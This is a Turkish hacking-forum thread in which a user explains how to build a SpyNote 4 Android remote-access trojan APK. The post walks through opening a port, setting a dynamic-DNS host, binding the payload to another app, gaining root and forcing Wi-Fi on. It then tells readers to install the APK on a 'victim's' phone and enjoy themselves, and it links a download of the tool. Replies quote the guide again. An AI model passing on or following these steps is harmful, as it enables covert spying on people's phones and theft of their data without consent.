SpyNote 4 ile Android Cihazları Hackleyin // Code Red (1 Viewer)

Kare 

Kare Kurt
Credits
167
Rating - 0%
Merhaba SpyHackerz.org'un değerli üyeleri.,

Bu konumda sizlere SpyNote 4 Remote Application Tool'da nasıl apk oluşturabiliriz onu göstereceğim. Şu an sabahın körü saat 05:36 işim gücüm yok konu açıyorum birazdan yatıcam o yüzden bu konuda sadece nasıl apk oluşturabilirsiniz onu göstereceğim. Apkyi yedirdiğiniz cihazda neler yapabilirsiniz, nasıl yapabilirsiniz gibi şeylere dair konular bu akşam gelecek.

View hidden content is available for registered users!

SpyNote 4.0 - Apk nasıl oluşturulur ?

1 - Programı açalım ve açtığımız portu yazalım, Open Port diyelim. ( Her konumda olduğu gibi Sandboxie kullanarak açmanızı veyahut sanal cihaz kullanarak açmanızı şiddetle tavsiye ederim dostlar )
bkz (Port Nasıl Açılır ?) : https://spyhackerz.org/forum/threads/port-a%C3%A7ma-rat-kullanimi-2.14069/
bkz (Sandboxie Nedir, nasıl kullanılır ?) : https://spyhackerz.org/forum/threads/sandboxie-nedir-nasıl-kullanılır.20385/
upload_2019-5-22_5-43-6.png

2 - Üst Menüden "Tools > Build" yolundan gidelim.
upload_2019-5-22_5-44-25.png

3 - Terimler ve doldurmanız gereken yerler.
upload_2019-5-22_5-53-12.png

Port : Açtığınız port.
Host : Sabitlediğiniz ip adresi (duckdns, no-ip vs.) bkz (ip sabitleme) : https://spyhackerz.org/forum/threads/ip-sabitleme-rat-kullanımı-1.13847/
ApplicationName : Program adı
ServerName : Server (sunucu) Adı
ServiceName : Uygulamalarda gözükecek servis adı
versionName : Uygulama sürümü
icon : Apk'ye icon eklersiniz
bind Files : Başka bir .apk dosyası ile serverinizi birleştirebilirsiniz
root : Eğer cihaz rootlanmış ise root iznine erişim sağlarsınız
protected : Protected applicationsu aktif eder
Wi-Fi connection : Eğer Cihazın Wi-Fi bağlantısı kapalıysa açar

Apkyi oluşturduktan sonra tek yapmanız gereken kurbanın telefonunda apkyi yükleyip çalıştırmak.Ardından eğlencenize bakın dostlar :D İyi Forumlar.

SpyNote 4.0 İndir : http://bit.ly/spynotezz
SpyNote 4.0 VirusTotal : http://bit.ly/spyvt

Programı Sanal makine üzerinde ya da Sandboxie kullanarak açmanızı şiddetle tavsiye ediyorum. Program bana ait değildir ve gram dokunmadım, herhangi bir hacklenme durumunuzda sorumlu değilim arkadaşlar iyi forumlar.

meftun

buraya nasıl yazılıyor mk
Credits
0
Rating - 0%
Normal de ilgimi çekmez ama emeğin çok ellerine sağlık kardeşim ben de daha yatamadım yeni yatıcam

Credits
0
Rating - 0%

Bu konumda sizlere SpyNote 4 Remote Application Tool'da nasıl apk oluşturabiliriz onu göstereceğim. Şu an sabahın körü saat 05:36 işim gücüm yok konu açıyorum birazdan yatıcam o yüzden bu konuda sadece nasıl apk oluşturabilirsiniz onu göstereceğim. Apkyi yedirdiğiniz cihazda neler yapabilirsiniz, nasıl yapabilirsiniz gibi şeylere dair konular bu akşam gelecek.

***Hidden content cannot be quoted.******Hidden content cannot be quoted.******Hidden content cannot be quoted.***

bakalım

Credits
0
Rating - 0%

***Hidden content cannot be quoted.******Hidden content cannot be quoted.******Hidden content cannot be quoted.***

Gff

Credits
108
Rating - 0%

Adamsin

XenFun

Domaltazör
Credits
2,608
Rating - 100%

View hidden content is available for registered users!

SpyNote 4.0 - Apk nasıl oluşturulur ?

1 - Programı açalım ve açtığımız portu yazalım, Open Port diyelim. ( Her konumda olduğu gibi Sandboxie kullanarak açmanızı veyahut sanal cihaz kullanarak açmanızı şiddetle tavsiye ederim dostlar )
bkz (Port Nasıl Açılır ?) :
bkz (Sandboxie Nedir, nasıl kullanılır ?) :
View attachment 1347

2 - Üst Menüden "Tools > Build" yolundan gidelim.
View attachment 1348

3 - Terimler ve doldurmanız gereken yerler.
View attachment 1349

Port : Açtığınız port.
Host : Sabitlediğiniz ip adresi (duckdns, no-ip vs.) bkz (ip sabitleme) :
ApplicationName : Program adı
ServerName : Server (sunucu) Adı
ServiceName : Uygulamalarda gözükecek servis adı
versionName : Uygulama sürümü
icon : Apk'ye icon eklersiniz
bind Files : Başka bir .apk dosyası ile serverinizi birleştirebilirsiniz
root : Eğer cihaz rootlanmış ise root iznine erişim sağlarsınız
protected : Protected applicationsu aktif eder
Wi-Fi connection : Eğer Cihazın Wi-Fi bağlantısı kapalıysa açar

Apkyi oluşturduktan sonra tek yapmanız gereken kurbanın telefonunda apkyi yükleyip çalıştırmak.Ardından eğlencenize bakın dostlar :D İyi Forumlar.

SpyNote 4.0 İndir :
SpyNote 4.0 VirusTotal :

Programı Sanal makine üzerinde ya da Sandboxie kullanarak açmanızı şiddetle tavsiye ediyorum. Program bana ait değildir ve gram dokunmadım, herhangi bir hacklenme durumunuzda sorumlu değilim arkadaşlar iyi forumlar.

TŞK

Users who are viewing this thread